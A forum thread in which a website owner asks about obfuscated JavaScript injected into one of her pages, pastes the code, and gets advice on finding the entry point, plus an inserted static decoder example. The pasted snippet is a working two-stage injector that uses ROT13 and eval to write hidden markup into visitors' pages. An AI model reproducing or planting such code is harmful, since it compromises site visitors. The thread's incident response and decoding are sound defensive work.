One of my website customers emailed me and said her virus scanner kept shutting down her website I had updated... mine didn't, but I checked through the code anyways... and I have THIS at the bottom of one of my files... it was NOT put there by me, and I'm totally appalled it was there! I had just looked at the code yesterday and it wasn't... and today there it is! What is it, where did it come from? The virus scanner said the problem was coming from 24.85.141.139 and here is the code... (I removed the script tags)

var sf=" shapgvba cwzgq(d){ine xp,yfl=\"r|b'RhkB_98[5)XsvAPClwHix.e,2o:$uyT^&Vqa36Nd=-Z\\\"{`z]m@GS;UI c# 0}jWMt1pf7~(n4O*+g!\",xn=\"\",c,wah,xs=\"\",pr;sbe(xp=0;xp<d.yratgu;xp+ +){ c=d.puneNg(xp);wah=yfl.vaqrkBs(c);vs(wah>-1){ pr=((wah+1)%81-1);vs(pr<=0)pr+=81;xs+=yfl.puneNg(pr-1); } ryfr xs+=c;}xn+=xs;qbphzrag.jevgr(xn);}",aarf="";for(nyf=0;nyf<sf.length;nyf ++){ cqd = sf.charCodeAt(nyf);if((cqd>64 && cqd<78)||(cqd>96 && cqd<110)) cqd=cqd+13;else if((cqd>77 && cqd<91)||(cqd>109 && cqd<123))cqd=cqd-13;aarf=aarf.concat(String.fromCharCode(cqd));} var hw,u; eval( aarf );hw="<7s,N#!0G431x41|-{U4k47s,N#!{>0n'sx]|3!rJ,N!|a0{<SPRdyF0G431x41|- \\{Z4k4Ss,N#!\\{0SRP-\\{l!!#$//JJJr1''1G|M434Gj!Gs7rs']/99x!!rU7?{tn'sx ]|3!r,|i|,,|,t{\\{><\\/SPRdyF>{0KH0</7s,N#!>0"; pjmtd(hw);

What on earth is it?? Anyone know? There are also a lot of blank lines now at the bottom of the webpage that this code was on... is it safe to just delete this code and re-upload?

carrie
Without going through the steps to decipher the code it's hard to say for sure, but all the signs are there. Mysterious code that has obviously been obfuscated, wasn't put there by the person who made the page, and is throwing up warnings on AV software? The smart money is on malicious code. Simply deleting it is only a temporary solution until you close the hole that led to the problem. How is content handled on that site? Is it dynamic? Static? How is it stored? Database? Includes? Are GET, POST, or COOKIE variables outputted without proper sanitization?
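The first deciphering step mentioned above, as an added example that is not part of the original thread: the visible loop in the posted snippet is ROT13, so the string it hands to eval can be recovered by treating the snippet as text and never running it. The function names and the SAMPLE input are constructed for illustration.

```javascript
// Added example: static first-stage decode. Nothing here calls eval().

// ROT13 over ASCII letters, using the same arithmetic as the injected loop
// (A-M / a-m shift up by 13, N-Z / n-z shift down by 13).
function rot13(text) {
  let out = "";
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    if ((code > 64 && code < 78) || (code > 96 && code < 110)) {
      out += String.fromCharCode(code + 13);
    } else if ((code > 77 && code < 91) || (code > 109 && code < 123)) {
      out += String.fromCharCode(code - 13);
    } else {
      out += ch; // digits, punctuation and spaces pass through unchanged
    }
  }
  return out;
}

// Inspect a suspicious snippet as plain text and report what it would eval.
function inspectSnippet(source) {
  // First double-quoted string assigned with var, allowing escaped characters.
  const literal = /var\s+\w+\s*=\s*"((?:[^"\\]|\\.)*)"/.exec(source);
  const report = {
    hasRot13Loop: /charCodeAt/.test(source) && /[+-]\s*13\b/.test(source),
    callsEval: /\beval\s*\(/.test(source),
    writesToPage: false,
    stage1: null,
  };
  if (literal) {
    // Simplification (assumption): only escapes of the form \x -> x are resolved.
    report.stage1 = rot13(literal[1].replace(/\\(.)/g, "$1"));
    report.writesToPage = /document\.write/.test(report.stage1);
  }
  return report;
}

// Constructed sample with the same shape as the injected code and a harmless body.
const SAMPLE =
  'var sf="shapgvba fubj(z){qbphzrag.jevgr(z);}",aarf="";' +
  'for(i=0;i<sf.length;i++){c=sf.charCodeAt(i);' +
  'if((c>64&&c<78)||(c>96&&c<110))c=c+13;' +
  'else if((c>77&&c<91)||(c>109&&c<123))c=c-13;' +
  'aarf=aarf.concat(String.fromCharCode(c));}eval(aarf);show("hi");';

console.log(inspectSnippet(SAMPLE));
```

A decoded first stage that ends in document.write, as in the sample, means the second string in the snippet is markup the script injects into the page when a visitor loads it.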
critic.. there's just really nothing amazing about the page... mostly straight HTML, no get, no post, the most exciting thing is javascript pop up windows and an All Web Menus pro menu... (also javascript).. it's just an old site that was made years ago, and just gets some photos updated now and then... nothing spectacular at all... I'll ask the hosting company however and see what they have to say about it... thanks! carrie
What was the CHMOD of the page? Did it have write permissions, or was there any way a form could have posted data to it? Aside from this, it may be a trojan on your server, so I suggest that you contact your host.